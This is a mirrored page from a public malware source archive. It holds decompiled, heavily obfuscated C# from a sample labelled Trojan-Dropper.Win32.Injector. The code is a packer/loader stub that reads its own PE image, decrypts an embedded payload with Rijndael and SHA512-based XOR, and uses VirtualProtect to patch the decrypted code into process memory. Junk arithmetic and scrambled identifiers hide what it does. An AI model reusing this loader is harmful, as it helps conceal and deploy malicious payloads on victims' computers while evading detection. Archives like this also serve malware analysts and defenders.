mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
156 lines
11 KiB
C#
156 lines
11 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
|
// Type: 쁽䘑㬢䭎싲<E4AD8E>Ⓑ薢
|
|||
|
|
// Assembly: scan, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
|
// MVID: C0A4408A-6830-4FA8-819B-3D801C5B54D7
|
|||
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.epwx-6071ef40caa18e93eea0d00f252e0ef03c97d96be12ad3f375d8a38aa3517cd6.exe
|
|||
|
|
|
|||
|
|
using System;
|
|||
|
|
using System.IO;
|
|||
|
|
using System.Reflection;
|
|||
|
|
using System.Runtime.InteropServices;
|
|||
|
|
using System.Security.Cryptography;
|
|||
|
|
|
|||
|
|
internal static class 쁽䘑㬢䭎싲\uFFFD\u24B7薢
|
|||
|
|
{
|
|||
|
|
[DllImport("kernel32.dll", EntryPoint = "VirtualProtect", PreserveSig = false)]
|
|||
|
|
private static extern bool 稀\uE109那\u26E8춷㘓㦹꧑(
|
|||
|
|
IntPtr _param0,
|
|||
|
|
uint _param1,
|
|||
|
|
uint _param2,
|
|||
|
|
out uint _param3);
|
|||
|
|
|
|||
|
|
public static unsafe void 믎Յ퀜ᱨ䄺涱㸿ꋶ()
|
|||
|
|
{
|
|||
|
|
Module module = typeof (쁽䘑㬢䭎싲\uFFFD\u24B7薢).Module;
|
|||
|
|
IntPtr hinstance = Marshal.GetHINSTANCE(module);
|
|||
|
|
if (hinstance == (IntPtr) -1)
|
|||
|
|
goto label_2;
|
|||
|
|
label_1:
|
|||
|
|
Stream input;
|
|||
|
|
bool flag;
|
|||
|
|
if (module.FullyQualifiedName == "<Unknown>")
|
|||
|
|
{
|
|||
|
|
flag = true;
|
|||
|
|
input = (Stream) new UnmanagedMemoryStream((byte*) hinstance.ToPointer(), (long) (int) (268435478.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), (long) (int) (268435478.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), (FileAccess) (26.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0));
|
|||
|
|
}
|
|||
|
|
else
|
|||
|
|
goto label_5;
|
|||
|
|
label_4:
|
|||
|
|
byte[] numArray1;
|
|||
|
|
byte[] numArray2;
|
|||
|
|
ulong num1;
|
|||
|
|
int dstOffset;
|
|||
|
|
byte[] numArray3;
|
|||
|
|
int position;
|
|||
|
|
int count1;
|
|||
|
|
using (BinaryReader binaryReader = new BinaryReader(input))
|
|||
|
|
{
|
|||
|
|
input.Seek((long) (int) (83.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), SeekOrigin.Begin);
|
|||
|
|
uint offset1 = binaryReader.ReadUInt32();
|
|||
|
|
input.Seek((long) offset1, SeekOrigin.Begin);
|
|||
|
|
input.Seek((long) (int) (29.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), SeekOrigin.Current);
|
|||
|
|
int num2 = (int) binaryReader.ReadUInt16();
|
|||
|
|
Stream stream = input;
|
|||
|
|
int num3 = (int) offset1;
|
|||
|
|
int num4 = (int) (47.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0);
|
|||
|
|
uint num5;
|
|||
|
|
long offset2 = (long) (num5 = (uint) (num3 + num4));
|
|||
|
|
stream.Seek(offset2, SeekOrigin.Begin);
|
|||
|
|
int num6 = (int) binaryReader.ReadUInt16();
|
|||
|
|
input.Seek((long) (int) (85.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), SeekOrigin.Current);
|
|||
|
|
position = (int) input.Position;
|
|||
|
|
int count2 = binaryReader.ReadInt32() ^ (int) (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0))) - 1945389408.0 - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0);
|
|||
|
|
if (count2 == (int) (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0))) - 1945389408.0 - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0))
|
|||
|
|
goto label_8;
|
|||
|
|
label_7:
|
|||
|
|
input.Seek(0L, SeekOrigin.Begin);
|
|||
|
|
numArray1 = binaryReader.ReadBytes(count2);
|
|||
|
|
num1 = binaryReader.ReadUInt64() ^ 8675158181231138756UL;
|
|||
|
|
dstOffset = binaryReader.ReadInt32();
|
|||
|
|
count1 = binaryReader.ReadInt32();
|
|||
|
|
numArray3 = binaryReader.ReadBytes(binaryReader.ReadInt32() ^ (int) (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0))) - 74420171.0 - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0));
|
|||
|
|
numArray2 = binaryReader.ReadBytes(binaryReader.ReadInt32() ^ (int) (1200253018.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0));
|
|||
|
|
goto label_12;
|
|||
|
|
label_8:
|
|||
|
|
Environment.FailFast("Broken file");
|
|||
|
|
goto label_7;
|
|||
|
|
}
|
|||
|
|
label_12:
|
|||
|
|
Buffer.BlockCopy((Array) new byte[(int) (27.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)], 0, (Array) numArray1, position, (int) (27.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0));
|
|||
|
|
if (dstOffset != 0)
|
|||
|
|
goto label_16;
|
|||
|
|
label_15:
|
|||
|
|
byte[] hash = MD5.Create().ComputeHash(numArray1);
|
|||
|
|
if ((long) (BitConverter.ToUInt64(hash, 0) ^ BitConverter.ToUInt64(hash, (int) (31.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0))) != (long) num1)
|
|||
|
|
goto label_18;
|
|||
|
|
label_14:
|
|||
|
|
byte[] src = 쁽䘑㬢䭎싲\uFFFD\u24B7薢.\uE48C鬄უ\u319F\u2A31\u2F8B\uF3C3\u2EE7(numArray1, numArray3, numArray2);
|
|||
|
|
Buffer.BlockCopy((Array) new byte[numArray1.Length], 0, (Array) numArray1, 0, numArray1.Length);
|
|||
|
|
if ((int) src[0] != (int) (237.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0) || (int) src[1] != (int) (134.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0))
|
|||
|
|
goto label_17;
|
|||
|
|
label_13:
|
|||
|
|
byte[] numArray4 = new byte[src.Length - (int) (25.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)];
|
|||
|
|
Buffer.BlockCopy((Array) src, (int) (25.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), (Array) numArray4, 0, numArray4.Length);
|
|||
|
|
using (BinaryReader binaryReader = new BinaryReader((Stream) new MemoryStream(numArray4)))
|
|||
|
|
{
|
|||
|
|
uint length = binaryReader.ReadUInt32();
|
|||
|
|
int[] numArray5 = new int[(IntPtr) length];
|
|||
|
|
IntPtr[] numArray6 = new IntPtr[(IntPtr) length];
|
|||
|
|
for (int index = 0; (long) index < (long) length; ++index)
|
|||
|
|
{
|
|||
|
|
uint num7 = binaryReader.ReadUInt32() ^ (uint) (int) (490849795.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0);
|
|||
|
|
if (num7 != 0U)
|
|||
|
|
{
|
|||
|
|
uint num8 = binaryReader.ReadUInt32() ^ (uint) (int) (490849795.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0);
|
|||
|
|
byte[] source = binaryReader.ReadBytes(binaryReader.ReadInt32());
|
|||
|
|
IntPtr destination = (IntPtr) (long) (uint) ((int) hinstance + (flag ? (int) num7 : (int) num8));
|
|||
|
|
uint num9;
|
|||
|
|
쁽䘑㬢䭎싲\uFFFD\u24B7薢.稀\uE109那\u26E8춷㘓㦹꧑(destination, (uint) source.Length, (uint) (int) (27.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), out num9);
|
|||
|
|
Marshal.Copy(source, 0, destination, source.Length);
|
|||
|
|
쁽䘑㬢䭎싲\uFFFD\u24B7薢.稀\uE109那\u26E8춷㘓㦹꧑(destination, (uint) source.Length, num9, out num9);
|
|||
|
|
numArray5[index] = source.Length;
|
|||
|
|
numArray6[index] = destination;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
return;
|
|||
|
|
}
|
|||
|
|
label_17:
|
|||
|
|
Environment.FailFast("Broken file");
|
|||
|
|
goto label_13;
|
|||
|
|
label_18:
|
|||
|
|
Environment.FailFast("Broken file");
|
|||
|
|
goto label_14;
|
|||
|
|
label_16:
|
|||
|
|
Buffer.BlockCopy((Array) new byte[count1], 0, (Array) numArray1, dstOffset, count1);
|
|||
|
|
goto label_15;
|
|||
|
|
label_5:
|
|||
|
|
flag = false;
|
|||
|
|
input = (Stream) new FileStream(module.FullyQualifiedName, (FileMode) (26.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), FileAccess.Read, FileShare.Read);
|
|||
|
|
goto label_4;
|
|||
|
|
label_2:
|
|||
|
|
Environment.FailFast("Module error");
|
|||
|
|
goto label_1;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
private static byte[] \uE48C鬄უ\u319F\u2A31\u2F8B\uF3C3\u2EE7(
|
|||
|
|
byte[] _param0,
|
|||
|
|
byte[] _param1,
|
|||
|
|
byte[] _param2)
|
|||
|
|
{
|
|||
|
|
Rijndael rijndael = Rijndael.Create();
|
|||
|
|
byte[] buffer = new byte[_param2.Length];
|
|||
|
|
using (CryptoStream cryptoStream = new CryptoStream((Stream) new MemoryStream(_param2), rijndael.CreateDecryptor(SHA256.Create().ComputeHash(_param0), _param1), CryptoStreamMode.Read))
|
|||
|
|
cryptoStream.Read(buffer, 0, _param2.Length);
|
|||
|
|
SHA512 shA512 = SHA512.Create();
|
|||
|
|
byte[] hash = shA512.ComputeHash(_param0);
|
|||
|
|
for (int offset = 0; offset < buffer.Length; offset += (int) (87.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0))
|
|||
|
|
{
|
|||
|
|
int num = buffer.Length <= offset + (int) (87.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0) ? buffer.Length : offset + (int) (87.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0);
|
|||
|
|
for (int index = offset; index < num; ++index)
|
|||
|
|
buffer[index] ^= (byte) ((int) hash[index - offset] ^ (int) (155.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0));
|
|||
|
|
hash = shA512.ComputeHash(buffer, offset, num - offset);
|
|||
|
|
}
|
|||
|
|
return buffer;
|
|||
|
|
}
|
|||
|
|
}
|